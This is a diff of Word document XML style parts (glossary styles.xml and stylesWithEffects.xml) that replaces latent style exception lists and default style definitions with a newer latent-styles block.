-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
-    <w:name w:val="Normal"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37DBAF1854124417908D74BB902BA405">
-    <w:name w:val="37DBAF1854124417908D74BB902BA405"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1BB6E017ABC349668A76D2E6B6FF09CD">
-    <w:name w:val="1BB6E017ABC349668A76D2E6B6FF09CD"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E96642C30A904F28BB3EE8E0446B61BF">
-    <w:name w:val="E96642C30A904F28BB3EE8E0446B61BF"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4B173BECAA9E495388C88F13B941B9C4">
-    <w:name w:val="4B173BECAA9E495388C88F13B941B9C4"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5A5511C25BAE4A17AC4003190907EC5E">
-    <w:name w:val="5A5511C25BAE4A17AC4003190907EC5E"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AA04B5C9366F44B9967EE15278B1E7FF">
-    <w:name w:val="AA04B5C9366F44B9967EE15278B1E7FF"/>
-    <w:rsid w:val="00FB4360"/>
-  </w:style>
-</w:styles>
-</file>
-
-<file path=word/glossary/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="22"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
+    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
